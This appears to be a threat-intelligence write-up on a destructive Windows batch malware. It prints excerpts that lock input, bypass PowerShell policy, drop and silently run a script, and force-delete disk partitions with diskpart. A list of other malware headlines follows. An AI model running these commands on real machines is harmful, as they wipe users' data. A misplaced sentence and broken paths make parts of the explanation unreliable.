A Simple Batch File That Blocks Computer usage

The function BlockInput expects one parameter: TRUE or FALSE. When TRUE is passed, it blocks keyboard and mouse input events from reaching applications.
From the user’s point of view, it means that no interaction is possible with the computer until the API is called a second time with “FALSE”.
This API is provided by Microsoft to prevent the user to perform actions when the computer executes sensitive operations.

The next one-liner used reconfigures the way the power button works:

powershell -exec bypass -w h -c “powercfg -setacvalueindex scheme_balanced sub_buttons pbuttonaction 0”
powercfg.exe is a standard tool provided by Microsoft[2] that allows interaction with power schemes.

Then, the script drops two scripts on the target:

set WshShell = wscript.createobject(“WScript.shell”)
WshShell.run “””C:WindowsTempx.bat”” “, 0, true
The file x.bat is a long script that destroys the victim’s computer. Here are some pieces of code:

:: deleting some Windows partitions
echo Select Disk 0 >> y.txt
echo Select Partition 2 >> y.txt
echo Delete Partition Override >> y.txt
echo Select Partition 4 >> y.txt
echo Delete Partition Override >> y.txt
diskpart /s y.txt >nul

Also possible:

:: creating a message box
echo msgbox”stupid b*tch”,0 , “get rekt, ur PC has been f*cked” >> y.vbs

This is a common anti-debugging technique implemented by malware to prevent the Analyst to interact with the debugger.

Sign Up For Threat Alerts

Threats Icon

Jan 18, 2022

Destructive malware targeting Ukrainian organizations

Microsoft Threat Intelligence Center (MSTIC) has identified evidence of a destructive malware operation targeting multiple...

Threats Icon

Jan 17, 2022

Iranian MOIS hacker group MuddyWater

Iranian MOIS hacker group MuddyWater is using a suite of malware to conduct espionage and...

Threats Icon

Jan 16, 2022

Abcbot – An Evolution of Xanthe

Abcbot, the emerging botnet that was recently analyzed and reported on, has a longer history...

Threats Icon

Jan 13, 2022

Night Sky is the latest ransomware targeting...

According to MalwareHunterTeam, who first spotted the new ransomware, the Night Sky operation has two...

Threats Icon

Jan 12, 2022

New SysJoker Backdoor Targets Windows, Linux, and...

Malware targeting multiple operating systems has become no exception in the malware threat landscape. Vermilion...

Threats Icon

Jan 10, 2022

New Konni Campaign Targeting Russian Ministry Of...

Black Lotus Labs, the threat research team of Lumen Technologies, uncovered a series of targeted...

Threats Icon

Jan 09, 2022

Elephant Beetle

Sygnia's Incident Response (IR) team has been tracking a financially motivated threat group targeting and...

Threats Icon

Jan 05, 2022

New Zloader Banking Malware Campaign Exploiting Microsoft...

An ongoing ZLoader malware campaign has been uncovered exploiting remote monitoring tools and a nine-year-old...

Threats Icon

Jan 04, 2022

Malicious Telegram Installer Drops Purple Fox Rootkit

This installer is a compiled AutoIt (a freeware BASIC-like scripting language designed for automating Windows...

Threats Icon

Jan 04, 2022

The dirty dozen of Latin America: From...

Latin American banking trojans are an ongoing, evolving threat They target mainly Brazil, Spain, and...

Threats Icon

Jan 02, 2022

Flagpro: The new malware used by BlackTech

BlackTech has been actively attacking, some attack cases against Japanese companies were observed. BlackTech uses...

Threats Icon

Dec 29, 2021

Dridex Distributed with “Merry Christmas!” Excel File

Dridex is a banking malware that collects a user's banking credentials and performs malicious behaviors...

Threats Icon

Dec 28, 2021

New Rook Ransomware Feeds Off the Code...

Rook claimed its first victim: a Kazkh financial institution from which the Rook operators had...

Threats Icon

Dec 27, 2021

Malicious Notepad++ installers push StrongPity malware

The sophisticated hacking group known as StrongPity is circulating laced Notepad++ installers that infect targets...

Threats Icon

Dec 26, 2021

“Spider-Man: No Way Home” Download Installs Cryptominer

The origin of the Monero cryptominer file has been traced to a Russian torrent website,...